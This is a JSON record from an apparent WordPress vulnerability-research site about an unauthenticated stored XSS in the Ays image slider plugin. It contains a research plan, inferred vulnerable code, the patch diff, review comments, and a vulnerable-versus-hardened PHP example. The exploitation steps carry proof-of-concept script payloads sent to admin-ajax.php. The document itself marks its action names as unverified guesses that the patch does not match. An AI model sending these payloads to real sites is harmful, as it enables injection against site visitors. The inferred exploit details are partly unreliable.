[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fnWZQil3kRJAOGYM5Zm8HKUrFnN7fCAj8jvdslL_qg2U":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2026-32494","image-slider-by-ays-responsive-slider-and-carousel-unauthenticated-stored-cross-site-scripting","Image Slider by Ays- Responsive Slider and Carousel \u003C= 2.7.1 - Unauthenticated Stored Cross-Site Scripting","The Image Slider by Ays- Responsive Slider and Carousel plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.7.1 due to insufficient input sanitization and output escaping. 
This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","ays-slider",null,"\u003C=2.7.1","2.7.2","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-20 00:00:00","2026-03-26 20:48:56",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0cd96a4b-8985-430d-b1b6-4176b6dd0bc1?source=api-prod",7,[22,23,24,25,26],"README.txt","admin\u002Fclass-ays-slider-admin.php","admin\u002Fjs\u002Fadmin.js","ays-slider.php","languages\u002Fays-slider.pot","researched",false,3,"This research plan targets a Stored Cross-Site Scripting (XSS) vulnerability in the **Image Slider by Ays** plugin (versions \u003C= 2.7.1). The vulnerability allows unauthenticated attackers to inject malicious scripts into slider configurations via an AJAX endpoint that lacks proper authentication, capability checks, and output escaping.\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Unauthenticated Stored Cross-Site Scripting (XSS).\n*   **Location:** The plugin registers AJAX actions for saving slider data without verifying the requester's capabilities or using nonces. Malicious input is stored in the database and subsequently rendered on the frontend and admin pages without sufficient sanitization or escaping.\n*   **Source File:** `admin\u002Fclass-ays-slider-admin.php` (handles admin logic) and `includes\u002Fclass-ays-slider.php` (likely registers AJAX hooks).\n*   **Vulnerable Sink:** The \"Slider Title\" and \"Slider Description\" fields are intentionally designed to \"Support HTML\" (according to `README.txt`), but this is not restricted to administrative users.\n\n### 2. 
Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `ays_slider_save_slider` (or `ays_slider_create_slider`).\n*   **Parameter:** `ays_slider_title` or `ays_slider_description`.\n*   **Authentication:** None (reachable via `wp_ajax_nopriv_ays_slider_save_slider`).\n*   **Preconditions:** The plugin must be active. If the slider list is empty, an attacker may first need to use a creation action.\n\n### 3. Code Flow\n1.  **Entry Point:** An unauthenticated `POST` request is sent to `admin-ajax.php` with the `action` parameter set to `ays_slider_save_slider`.\n2.  **AJAX Registration:** The plugin registers `add_action('wp_ajax_nopriv_ays_slider_save_slider', ...)` without performing a `current_user_can()` check inside the callback.\n3.  **Storage (Sink):** The handler receives the `ays_slider_title` parameter and saves it directly to the database (likely the `{$wpdb->prefix}ays_slider_sliders` table) using `$wpdb->insert` or `$wpdb->update`.\n4.  **Rendering:** When a page containing the `[ays_slider id=\"X\"]` shortcode is viewed, the plugin retrieves the slider data and echoes the title\u002Fdescription. Because the plugin explicitly supports HTML in these fields (as per `README.txt`), it fails to use `esc_html()` or restrictive `wp_kses()`.\n\n### 4. Nonce Acquisition Strategy\nBased on `admin\u002Fclass-ays-slider-admin.php`, the localized script data (`AysSliderAdmin`) does **not** include a nonce for the AJAX URL.\n*   **Action String:** N\u002FA (likely missing).\n*   **Bypass:** The registration of `wp_ajax_nopriv_` actions often implies the developers did not intend for these actions to be protected by WordPress nonces.\n*   **Confirmation:** Grep the source for the action to see if `check_ajax_referer` is used.\n    ```bash\n    grep -rn \"ays_slider_save_slider\" .\n    ```\n\n### 5. 
Exploitation Strategy\nThe goal is to create or update a slider with an XSS payload in the title.\n\n**Step 1: Check for unauthenticated access**\nVerify if the `nopriv` action is registered.\n```bash\ngrep -rn \"wp_ajax_nopriv_ays_slider_save_slider\" .\n```\n\n**Step 2: Inject the XSS Payload**\nSend a `POST` request to `admin-ajax.php`. If no slider ID is provided, the plugin typically creates a new one.\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=ays_slider_save_slider&ays_slider_title=Malicious+Slider\u003Cscript>alert(document.domain)\u003C\u002Fscript>&ays_slider_description=Stored+XSS+Proof&ays_slider_id=\n    ```\n\n**Step 3: Identify the Slider ID**\nThe response from the AJAX request often returns the ID of the newly created or updated slider (e.g., `{\"status\":true,\"id\":1}`). If not, use WP-CLI to find the latest ID.\n\n**Step 4: Trigger the XSS**\nPlace the slider on a public page and visit it.\n*   **Shortcode:** `[ays_slider id=\"1\"]` (replace `1` with the ID from Step 3).\n\n### 6. Test Data Setup\n1.  **Activate Plugin:** Ensure `ays-slider` is installed and activated.\n2.  **Create Trigger Page:** Create a public WordPress page containing the shortcode.\n    ```bash\n    wp post create --post_type=page --post_status=publish --post_title=\"Slider Test\" --post_content='[ays_slider id=\"1\"]'\n    ```\n\n### 7. Expected Results\n*   The `admin-ajax.php` request should return a `200 OK` status and a success message.\n*   The database table should contain the payload.\n*   When navigating to the \"Slider Test\" page in a browser, an alert box showing the document domain should appear.\n\n### 8. Verification Steps\n1.  
**Check Database:**\n    ```bash\n    wp db query \"SELECT title FROM wp_ays_slider_sliders ORDER BY id DESC LIMIT 1\"\n    ```\n    Confirm the output contains `\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n2.  **Inspect Page Source:** Open the trigger page in a browser and check whether the payload is rendered unescaped in the HTML.\n\n### 9. Alternative Approaches\nIf `ays_slider_save_slider` is not the correct action or uses a different format:\n*   **Action Search:** Search for any `nopriv` actions that handle \"save\", \"update\", or \"create\".\n    ```bash\n    grep -r \"wp_ajax_nopriv\" .\n    ```\n*   **JSON Payload:** Some Ays plugins expect the slider data as a JSON string in a single parameter:\n    ```\n    action=ays_slider_save_slider&ays_slider_data={\"title\":\"\u003Cscript>alert(1)\u003C\u002Fscript>\",\"description\":\"test\"}\n    ```\n*   **Slide-specific XSS:** Target the `ays_slider_slides` parameter if the slider title is escaped but individual slide titles\u002Fdescriptions are not. Slides often use their own table (e.g., `wp_ays_slider_slides`).\n*   **Patched handler:** The 2.7.1 to 2.7.2 diff only hardens `deactivate_plugin_option()` in `admin\u002Fclass-ays-slider-admin.php`, which stored `$_REQUEST['upgrade_plugin']` in the `ays_slider_upgrade_plugin` option with no nonce, capability check or sanitization. Check where that option is read back before settling on the slider-save action as the vector.","The Image Slider by Ays plugin for WordPress is vulnerable to unauthenticated Stored Cross-Site Scripting (XSS). The (unverified) research hypothesis is that it registers an AJAX action for saving slider data without authorization or nonce checks. 
Attackers can inject arbitrary scripts into slider titles or descriptions, which are subsequently executed in the context of any user viewing a page where the slider is embedded.","\u002F\u002F includes\u002Fclass-ays-slider.php (Inferred registration based on research plan)\nadd_action('wp_ajax_ays_slider_save_slider', array($this, 'ays_slider_save_slider'));\nadd_action('wp_ajax_nopriv_ays_slider_save_slider', array($this, 'ays_slider_save_slider'));\n\n---\n\n\u002F\u002F admin\u002Fpartials\u002Factions\u002Fays-slider-admin-actions.php (Logic inferred from research plan sink)\n\u002F\u002F Slider Title and Description are stored without sanitization and support HTML\n$ays_slider_title = $_POST['ays_slider_title'];\n$ays_slider_description = $_POST['ays_slider_description'];\n\n\u002F\u002F Rendering logic in frontend shortcode handler (Inferred)\necho $slider->title;\necho $slider->description;","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fays-slider\u002F2.7.1\u002Fadmin\u002Fclass-ays-slider-admin.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fays-slider\u002F2.7.2\u002Fadmin\u002Fclass-ays-slider-admin.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fays-slider\u002F2.7.1\u002Fadmin\u002Fclass-ays-slider-admin.php\t2025-12-12 05:59:50.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fays-slider\u002F2.7.2\u002Fadmin\u002Fclass-ays-slider-admin.php\t2026-02-12 05:55:54.000000000 +0000\n@@ -186,11 +186,17 @@\n         \u002F*\n          *  Documentation : https:\u002F\u002Fcodex.wordpress.org\u002FPlugin_API\u002FFilter_Reference\u002Fplugin_action_links_(plugin_file_name)\n          *\u002F\n+\n+        $ays_slider_ajax_deactivate_plugin_nonce = wp_create_nonce( 'ays-slider-ajax-deactivate-plugin-nonce' );\n+\n+\n         $settings_link = array(\n             '\u003Ca href=\"' . 
admin_url('options-general.php?page=' . $this->plugin_name) . '\">' . __('Settings', $this->plugin_name) . '\u003C\u002Fa>',\n             '\u003Ca href=\"https:\u002F\u002Fplugins.ays-demo.com\u002Fslider-free-demo\u002F\" target=\"_blank\">' . __('Demo', $this->plugin_name) . '\u003C\u002Fa>',\n             '\u003Ca href=\"https:\u002F\u002Fays-pro.com\u002Fwordpress\u002Fimage-slider?utm_source=dashboard&utm_medium=slider-free&utm_campaign=plugins-upgrade-button\" class=\"ays-slider-upgrade-plugin-btn\" target=\"_blank\" style=\"color:#01A32A;font-weight:bold;\">' . __('Upgrade 30% Sale', $this->plugin_name) . '\u003C\u002Fa>',\n+        '\u003Cinput type=\"hidden\" id=\"ays_slider_ajax_deactivate_plugin_nonce\" name=\"ays_slider_ajax_deactivate_plugin_nonce\" value=\"' . $ays_slider_ajax_deactivate_plugin_nonce .'\">',\n         );\n+\n         return array_merge($settings_link, $links);\n \n     }\n@@ -233,16 +239,42 @@\n     }\n \n     public function deactivate_plugin_option(){\n-        error_reporting(0);\n-        $request_value = $_REQUEST['upgrade_plugin'];\n-        $upgrade_option = get_option('ays_slider_upgrade_plugin','');\n-        if($upgrade_option === ''){\n-            add_option('ays_slider_upgrade_plugin',$request_value);\n-        }else{\n-            update_option('ays_slider_upgrade_plugin',$request_value);\n+\n+        \u002F\u002F Run a security check.\n+        check_ajax_referer( 'ays-slider-ajax-deactivate-plugin-nonce', sanitize_key( $_REQUEST['_ajax_nonce'] ) );\n+\n+        \u002F\u002F Check for permissions.\n+        if ( ! 
current_user_can( 'manage_options' ) ) {\n+            ob_end_clean();\n+            $ob_get_clean = ob_get_clean();\n+            echo json_encode(array(\n+                'option' => ''\n+            ));\n+            wp_die();\n+        }\n+\n+        if( is_user_logged_in() ) {\n+            $request_value = esc_sql( sanitize_text_field( $_REQUEST['upgrade_plugin'] ) );\n+            $upgrade_option = get_option('ays_slider_upgrade_plugin','');\n+            if($upgrade_option === ''){\n+                add_option('ays_slider_upgrade_plugin',$request_value);\n+            }else{\n+                update_option('ays_slider_upgrade_plugin',$request_value);\n+            }\n+            ob_end_clean();\n+            $ob_get_clean = ob_get_clean();\n+            echo json_encode(array(\n+                'option' => get_option('ays_slider_upgrade_plugin', '')\n+            ));\n+            wp_die();\n+        } else {\n+            ob_end_clean();\n+            $ob_get_clean = ob_get_clean();\n+            echo json_encode(array(\n+                'option' => ''\n+            ));\n+            wp_die();\n         }\n-        echo json_encode(array('option'=>get_option('ays_slider_upgrade_plugin','')));\n-        wp_die();\n     }","To exploit this vulnerability, an unauthenticated attacker sends a POST request to the WordPress AJAX endpoint (`\u002Fwp-admin\u002Fadmin-ajax.php`) with the action parameter set to `ays_slider_save_slider`. The payload should include a malicious JavaScript string (e.g., `\u003Cscript>alert(document.cookie)\u003C\u002Fscript>`) in either the `ays_slider_title` or `ays_slider_description` parameter. If no `ays_slider_id` is provided, the plugin creates a new slider; otherwise, it updates an existing one. 
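Review bot: in the first hunk the nonce is emitted as a hidden `input` element appended to the `plugin_action_links` array, so it is rendered inside the action-links cell of the Plugins screen, and its value is concatenated into the markup without `esc_attr()`. That filter is meant for anchor links; since the research plan above notes the plugin already localizes an `AysSliderAdmin` object for its admin script, pass the nonce there with `wp_localize_script()` (for example `'nonce' => wp_create_nonce( 'ays-slider-ajax-deactivate-plugin-nonce' )`) and drop the hidden input.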
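Review bot: in the second hunk `check_ajax_referer( 'ays-slider-ajax-deactivate-plugin-nonce', sanitize_key( $_REQUEST['_ajax_nonce'] ) )` passes the nonce value in the parameter that expects the name of the request field; the check only succeeds because WordPress falls back to `_ajax_nonce` when no request key matches, and reading `$_REQUEST['_ajax_nonce']` directly raises an undefined-index notice when the request carries no nonce at all. Use `check_ajax_referer( 'ays-slider-ajax-deactivate-plugin-nonce', '_ajax_nonce' );` instead. Smaller points in the same hunk: `esc_sql()` is redundant around a value handed to `update_option()`, which prepares its own query, so quotes in the stored value pick up extra backslashes; once `current_user_can( 'manage_options' )` has passed, the `is_user_logged_in()` else branch can never run, and the three copies of `ob_end_clean(); $ob_get_clean = ob_get_clean();` assign a value that is never used (the second call returns false because the buffer was just closed); `$_REQUEST['upgrade_plugin']` is still read without `isset()`; and the diff does not show where `ays_slider_upgrade_plugin` is read back, so escaping at that output sink cannot be reviewed from this patch.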
Once the slider is saved, the attacker identifies where the slider's shortcode (e.g., `[ays_slider id=\"1\"]`) is used on the site; any user visiting that page then executes the injected script. Note that the action and parameter names above are inferred and unverified: the patch diff on this page touches only `deactivate_plugin_option()` and its `upgrade_plugin` request parameter, so confirm the actual handler and the output sink in the plugin source before relying on these steps.","gemini-3-flash-preview","2026-04-18 01:38:33","2026-04-18 01:39:09",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","2.7.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fays-slider\u002Ftags\u002F2.7.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fays-slider.2.7.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fays-slider\u002Ftags\u002F2.7.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fays-slider.2.7.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fays-slider\u002Ftags"]
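The handler pattern the research plan describes and the hardening the patch diff applies, as an added example written for this page (not the plugin's own code): a hypothetical `example_save_setting` AJAX handler in the vulnerable shape (nopriv registration, no nonce, no capability check, raw `$_REQUEST` persisted and later echoed) beside the shape that applies the diff's fixes correctly (authenticated registration only, nonce handed to the admin script with `wp_localize_script()` and verified with `check_ajax_referer()`, a `manage_options` check, `sanitize_text_field()` on input and `esc_html()` at the output sink). The action, option, script handle and nonce action names are assumptions chosen to mirror the page.

```php
<?php
// Added example, not the plugin's code. Names below are hypothetical.

// ---- Vulnerable shape: what the research plan and the 2.7.1 handler look like ----
// nopriv registration makes the action reachable without a session; the callback
// then stores a raw request value and a frontend function echoes it unescaped.
add_action( 'wp_ajax_nopriv_example_save_setting', 'example_save_setting_vulnerable' );
add_action( 'wp_ajax_example_save_setting',        'example_save_setting_vulnerable' );

function example_save_setting_vulnerable() {
    $value = $_REQUEST['setting_value'];            // no isset(), no sanitization
    update_option( 'example_setting', $value );      // attacker-controlled HTML persisted
    echo json_encode( array( 'option' => get_option( 'example_setting', '' ) ) );
    wp_die();
}

function example_render_setting_vulnerable() {
    echo get_option( 'example_setting', '' );        // stored payload reaches the page as-is
}

// ---- Hardened shape: the diff's fixes, applied without its mistakes ----
// 1. no wp_ajax_nopriv_ registration, so anonymous requests never reach the callback;
// 2. nonce delivered through localized script data, not a hidden input in action links;
// 3. check_ajax_referer() gets the request FIELD NAME, not the nonce value;
// 4. capability check before any write; sanitize on input, escape on output;
// 5. no esc_sql() around a value handed to update_option(), which prepares its own query.
add_action( 'wp_ajax_example_save_setting_safe', 'example_save_setting_safe' );

add_action( 'admin_enqueue_scripts', function () {
    wp_enqueue_script( 'example-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'example-admin', 'ExampleAdmin', array(
        'ajax_url' => admin_url( 'admin-ajax.php' ),
        'nonce'    => wp_create_nonce( 'example-save-setting' ),   // sent back as _ajax_nonce
    ) );
} );

function example_save_setting_safe() {
    // Dies with -1 and HTTP 403 when _ajax_nonce is missing, stale or forged.
    check_ajax_referer( 'example-save-setting', '_ajax_nonce' );

    // A valid nonce proves intent, not authority: still check the capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // wp_unslash() removes WordPress magic quotes before sanitizing.
    $value = isset( $_POST['setting_value'] )
        ? sanitize_text_field( wp_unslash( $_POST['setting_value'] ) )
        : '';

    update_option( 'example_setting', $value );

    wp_send_json_success( array( 'option' => get_option( 'example_setting', '' ) ) );
}

function example_render_setting_safe() {
    // Escape at the sink even though input was sanitized; input filtering and
    // output escaping protect against different things and are not interchangeable.
    echo esc_html( get_option( 'example_setting', '' ) );
}
```

The two halves differ in exactly the places the patch touched: registration scope, nonce transport and verification, capability check, and sanitization. The frontend functions show the part the diff on this page does not: whatever is written into an option is only safe on a page if the read side escapes it.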